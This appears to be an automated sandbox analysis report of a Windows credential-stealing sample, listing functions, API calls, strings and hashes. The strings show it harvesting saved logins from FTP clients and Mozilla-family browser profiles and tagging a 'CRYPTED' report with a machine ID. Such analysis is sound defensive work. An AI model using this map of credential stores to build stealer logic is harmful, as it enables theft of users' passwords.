Password, xrefs: 004047DE

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$User
API String ID: 1332880857-1253078594
Opcode ID: 8ec461a1a81bc7ef45ee7558dd0ab108554fe709a5a8f809842cd8894194971f
Instruction ID: 274a7ee69c92ba69b68534aa4b7c6f7a3064639cd42e7684e15c5da6ae9acadd
Opcode Fuzzy Hash: 8ec461a1a81bc7ef45ee7558dd0ab108554fe709a5a8f809842cd8894194971f
Instruction Fuzzy Hash: F731D67584011CBADF217B51CC42BDDBAB9BF40304F50C5BAB644751B1CBB95B929F88

Function 00408C47 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408C5A
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C8E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D80

Strings

wiseftpsrvs.ini, xrefs: 00408D06
wiseftpsrvs.bin, xrefs: 00408D36
wiseftp.ini, xrefs: 00408D1E

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
API String ID: 1332880857-3184955129
Opcode ID: 9120772f693959893bd55fbdc736b9a95cce8a02e990c7d9ff4710f1ec01c8f3
Instruction ID: 325d504d10b34896ea1b4c5fbaf62ac50bfbabd257eae12ccd877be6926cd799
Opcode Fuzzy Hash: 9120772f693959893bd55fbdc736b9a95cce8a02e990c7d9ff4710f1ec01c8f3
Instruction Fuzzy Hash: BB31E73190010CBADF216F51CD42FDD7ABABF10304F50C4BAB548B40E1DEB99A919F98

Function 00409C05 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409C62
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409CA7

Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

\Mozilla\Firefox\, xrefs: 00409C28, 00409C67, 00409C84
Software\Mozilla, xrefs: 00409C71, 00409C8E
fireFTPsites.dat, xrefs: 00409C39
Firefox, xrefs: 00409C6C, 00409C89

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
API String ID: 3007406096-624000163
Opcode ID: 5f7cb387843003fabdb9ef3f85ca44dbae65937a894153b483956116ca7aa95d
Instruction ID: b9d621fa176d9065a05f04eb54e4155592955927bec9dc1664df1bf6593da777
Opcode Fuzzy Hash: 5f7cb387843003fabdb9ef3f85ca44dbae65937a894153b483956116ca7aa95d
Instruction Fuzzy Hash: 54015EB46803087ADB117B61CC07FDA7A699B00748F11803ABA04750E3DAF9DED09A5D

Function 00409A76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,?), ref: 00409A82
RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

PathToExe, xrefs: 00409A8D

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
String ID: PathToExe
API String ID: 3012581338-1982016430
Opcode ID: ee6375be52fdd90e3ac22076838d9a0d238ff78f1c752865507c4382589fc59f
Instruction ID: 6cf34a47728be60588df2f0b0875d8187c8a2cf3b5933b17400dd404251cc3d6
Opcode Fuzzy Hash: ee6375be52fdd90e3ac22076838d9a0d238ff78f1c752865507c4382589fc59f
Instruction Fuzzy Hash: 3C31DB31940109BAEF11BFA1CC42EEE7E75BF04344F50443AB610B41F2DBB99A60AB69

Function 0040263E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 00402674
GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004026F6
GlobalLock.KERNEL32(?), ref: 00402702
GlobalUnlock.KERNEL32(?), ref: 00402724

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB

Strings

Software\WinRAR, xrefs: 0040264E

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
String ID: Software\WinRAR
API String ID: 2536169780-224198155
Opcode ID: 9e909b1df8b367ba2edf9339469b90873308361c794d3207a948e00c31d30508
Instruction ID: c8bf2b1d8d6ff3924392204c1583eaa160c98ba1c68f5613f1a9897d3693f57a
Opcode Fuzzy Hash: 9e909b1df8b367ba2edf9339469b90873308361c794d3207a948e00c31d30508
Instruction Fuzzy Hash: CD21EB7590010DBBDF11BBA1CD86DDEBB69AF04348F1044B6B604F61F2D6BD8A94AB18

Function 0040464E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404664
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 0040469D
StrStrIA.SHLWAPI(?,Line), ref: 004046CE
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404753

Strings

Line, xrefs: 004046C2

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: Line
API String ID: 4012628704-1898322888
Opcode ID: a3ade369912dc51d8d70563a8441f0da65a209766a37348f98d8afa9ce308cc2
Instruction ID: 12ca7ed5bf862cbd5bc1baa86488653fd27923ee3fdb570bd1aa2b541a3cd975
Opcode Fuzzy Hash: a3ade369912dc51d8d70563a8441f0da65a209766a37348f98d8afa9ce308cc2
Instruction Fuzzy Hash: DB2127B580010CBACF21AB50CC41BEDBBB9BF41304F1085B6F605B50A0DBBA9B959F99

Function 0040E1AB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E1BE
RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E1F7
StrStrIA.SHLWAPI(?,.wjf), ref: 0040E23E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E26B

Strings

.wjf, xrefs: 0040E233

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: .wjf
API String ID: 4012628704-198459012
Opcode ID: 7f60c0cf3dcf63657f9e008a005949576ab99cfe9b63ec8ebcbc2bd73857eb15
Instruction ID: 635b00d09321aad8d0390620825c62aef4522b0aaa976ac0d3a633202ef0a810
Opcode Fuzzy Hash: 7f60c0cf3dcf63657f9e008a005949576ab99cfe9b63ec8ebcbc2bd73857eb15
Instruction Fuzzy Hash: 5711F93180410CFADF11AB91CC41FEEBBBDBF04304F0089B6A515B50A1DBB99BA59F99

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040263E: GetTempPathA.KERNEL32(00000104,?), ref: 00402674
Part of subcall function 0040263E: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004026F6
Part of subcall function 0040263E: GlobalLock.KERNEL32(?), ref: 00402702
Part of subcall function 0040263E: GlobalUnlock.KERNEL32(?), ref: 00402724

CoCreateGuid.OLE32(?,00000000), ref: 004043D0
wsprintfA.USER32 ref: 00404417
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404423

Strings

{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 0040440E
HWID, xrefs: 004043B7, 0040442D

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
API String ID: 1852535927-1100116640
Opcode ID: d69290c2852f38fe3840c2409b3cc238675d028e7aa4b29485f4ef02bda52cf0
Instruction ID: 5e87777bc5060c3288d1ddc94f92a97678ba2de14770e5ebdddae488d3891c5d
Opcode Fuzzy Hash: d69290c2852f38fe3840c2409b3cc238675d028e7aa4b29485f4ef02bda52cf0
Instruction Fuzzy Hash: 311139A68041987DDB61D2E64C11DFFBBFC5D0D345B5400ABBAA0E20C2D67D87409B38

Function 00409CBB Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409CE9

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409D2E

Strings

SeaMonkey, xrefs: 00409CF3, 00409D10
Software\Mozilla, xrefs: 00409CF8, 00409D15
\Mozilla\SeaMonkey\, xrefs: 00409CEE, 00409D0B

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
API String ID: 3062143572-164276155
Opcode ID: 734100071180b503af968ed3d886ec7bad35816776fa679acc086782baa18d40
Instruction ID: 18527764d4d72b8fb970a98e15af5eb733511619ec58281b58f0f306d236f264
Opcode Fuzzy Hash: 734100071180b503af968ed3d886ec7bad35816776fa679acc086782baa18d40
Instruction Fuzzy Hash: 52F05430680208BECB11AF55CC47FCD7A699B44748F61C066B608750E3DBF9CAE49B4D

Function 00409D42 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D70

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB5

Strings

Software\Mozilla, xrefs: 00409D7F, 00409D9C
Flock, xrefs: 00409D7A, 00409D97
\Flock\Browser\, xrefs: 00409D75, 00409D92

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Flock$Software\Mozilla$\Flock\Browser\
API String ID: 3062143572-1276807325
Opcode ID: 8b6780bfbdc0746c497a2fd31b1af50539d8cb091d52bcefd71787fea5f6ee35
Instruction ID: 43bcecda123058e56b32ec4d91b940529ca646ccc9c67ccf2eaae04472d4a507
Opcode Fuzzy Hash: 8b6780bfbdc0746c497a2fd31b1af50539d8cb091d52bcefd71787fea5f6ee35
Instruction Fuzzy Hash: EFF01D34780208BACB12AF51CC43FC97A6A9B04748F618166B608750E3DAB9CBD09B8D

Function 00409DC9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409DF7

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E3C

Strings

Software\Mozilla, xrefs: 00409E06, 00409E23
Mozilla, xrefs: 00409E01, 00409E1E
\Mozilla\Profiles\, xrefs: 00409DFC, 00409E19

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
API String ID: 3062143572-2716603926
Opcode ID: e7635e91d1c1a4b7b3a3a1702da752b1f4a217aba3b358ad1acf368ec54b1dd1
Instruction ID: 884d2f96a119383ee2cf1e37f627249cf192dde4241438316b10b3e49f4841a4
Opcode Fuzzy Hash: e7635e91d1c1a4b7b3a3a1702da752b1f4a217aba3b358ad1acf368ec54b1dd1
Instruction Fuzzy Hash: 80F01234680208BACB11BF51CC47FC97A669B04748F61806AB608750E3DEB9CAD49B8D

Function 00409B7E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409BAC

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BF1

Strings

\Mozilla\Firefox\, xrefs: 00409BB1, 00409BCE
Software\Mozilla, xrefs: 00409BBB, 00409BD8
Firefox, xrefs: 00409BB6, 00409BD3

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
API String ID: 3062143572-2631691096
Opcode ID: 37b2ef04d0e7510d6e5f5d2405b0b8b7f0fe9fc4806781b49336eaf77225c1eb
Instruction ID: 45882fd607fb23ed2b64d1253c82e84c58dab58a3b1451fa118ebf952c8182a3
Opcode Fuzzy Hash: 37b2ef04d0e7510d6e5f5d2405b0b8b7f0fe9fc4806781b49336eaf77225c1eb
Instruction Fuzzy Hash: B2F01D74680308BACB11AF61CC43FC97A699B04748F618066B608750E3DAF9DAD09B5D

Function 0040C884 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(011B3E08,3D-FTP), ref: 0040C8AB

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

3D-FTP, xrefs: 0040C8A5
\3D-FTP, xrefs: 0040C8F0
\SiteDesigner, xrefs: 0040C91F
sites.ini, xrefs: 0040C8C4, 0040C901, 0040C930

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
API String ID: 1884169789-4074339522
Opcode ID: cd97c642866f50748b5627df96894bca937bb1cfb0bf794aac23756af397cf38
Instruction ID: d80121f027e36e181415908592f12f448330d6b9ebeaa5fc54ca2e2f13994c15
Opcode Fuzzy Hash: cd97c642866f50748b5627df96894bca937bb1cfb0bf794aac23756af397cf38
Instruction Fuzzy Hash: 63119470640101B9EB2137718C86FBE2E5A9B80748F50853FB914F51E6DABCDE81926C

Function 0040AD02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040AD18
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AD4C
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AE34

Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAD5
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAE8
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AAFB
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB0E
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB21
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB34
Part of subcall function 0040AA69: wsprintfA.USER32 ref: 0040AB47

Strings

SiteServers, xrefs: 0040AD86

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: wsprintf$CloseEnumOpen
String ID: SiteServers
API String ID: 1693054222-2402683488
Opcode ID: b5be9dfb2b0f63a17abeaf029fb3e96679bf3fef23f808194cd3034a60cc03b9
Instruction ID: 8317cb43c360b6157995a82016f67b949468408628e18f08328f55d71d6d284c
Opcode Fuzzy Hash: b5be9dfb2b0f63a17abeaf029fb3e96679bf3fef23f808194cd3034a60cc03b9
Instruction Fuzzy Hash: 6131E031C0021CEADF21AB50CD41BDDBBBABF04305F54C0B6B148711A1CB795BA69F9A

Function 004017BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 004017CD
GlobalLock.KERNEL32(?), ref: 004017E8

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

GlobalUnlock.KERNEL32(?), ref: 00401846

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

PKDFILE0YUICRYPTED0YUI1.0, xrefs: 00401855

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlock
String ID: PKDFILE0YUICRYPTED0YUI1.0
API String ID: 1329788818-258907703
Opcode ID: f8bb7a0ff8973e21c828047d443a4022b30c66e91bb5de1119b795e99b1afc2e
Instruction ID: 0f424eb68057af49765608e2433f5076451fae3c9a9c6c9a3c844951889144b3
Opcode Fuzzy Hash: f8bb7a0ff8973e21c828047d443a4022b30c66e91bb5de1119b795e99b1afc2e
Instruction Fuzzy Hash: A721EDB2D00109BBDF017FA1CC42AAD7E75EF14344F10817ABA14B51B1E77A9B619B98

Function 00408B58 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408B6B
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408B9F
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C3E

Strings

MRU, xrefs: 00408BD7

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: MRU
API String ID: 1332880857-344939820
Opcode ID: e0065033d19b889746ee12682f53e5ffbda9088b4be23686f46e2ffa5439fd76
Instruction ID: 7a6d8f74823b480fdcef130df1ea023501839c472418de0c71100c79f9f545c2
Opcode Fuzzy Hash: e0065033d19b889746ee12682f53e5ffbda9088b4be23686f46e2ffa5439fd76
Instruction Fuzzy Hash: 9521293180010CBADF21AF51CD42FDDBBBABF00304F1085BAB548B51A1DBB99B919F99

Function 00401AD4 Relevance: 6.1, APIs: 4, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401B19
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B34
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401B6A
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B8C

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: f380ec298d3e7d0e7bb2719177cca8e66ea60fdd4146e6aa69eb770d0516df7b
Instruction ID: 4dafb1f052c8dde12143e590320f2d7fd46cce7fa02554cd8ebf7238d74450ed
Opcode Fuzzy Hash: f380ec298d3e7d0e7bb2719177cca8e66ea60fdd4146e6aa69eb770d0516df7b
Instruction Fuzzy Hash: 46214B31A00109EEDF119E94CD82FEF7BB9EB81358F104176F900A61B0E778AA91DB59

Function 0040BC36 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85stringCOMMON

Download Yara Rule

APIs

lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BC74
lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040BCA9

Part of subcall function 0040B922: StrStrIA.SHLWAPI(?,() ), ref: 0040B932

Strings

logins, xrefs: 0040BC6C
table, xrefs: 0040BCA4

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrcmplstrcmpi
String ID: logins$table
API String ID: 3524194181-3800951466
Opcode ID: 822f00db3de998862b9e7dc8475a2ee5e58da838fccea6e16635eeb49d5e38bb
Instruction ID: f643828713e7ccc4d29c7f764fe84bdc2b67d615cd256a1447e30655ba0c606e
Opcode Fuzzy Hash: 822f00db3de998862b9e7dc8475a2ee5e58da838fccea6e16635eeb49d5e38bb
Instruction Fuzzy Hash: 8031D579800209FACF21EF90CC55ADEBB79EF04324F10827BA624B11E0D7799A549B98

Function 00406DF5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

"password" : ", xrefs: 00406E3F, 00406E52

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: "password" : "
API String ID: 0-2310853927
Opcode ID: 690feedc7829ebbb85806371f7e8c01c07bdbc92840d4c8cd1c9171ad597f43e
Instruction ID: c3ebef3399e8fdb68a5e01a868bf6b84610cbe8615c69148f54c6662ba108e4c
Opcode Fuzzy Hash: 690feedc7829ebbb85806371f7e8c01c07bdbc92840d4c8cd1c9171ad597f43e
Instruction Fuzzy Hash: 33218E32800109BECF11ABA1CC02DEF7E65AF55344F114537F905B51A1D6794EA1E7E9

Function 0040D0F6 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040D140

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

FTP Count, xrefs: 0040D100
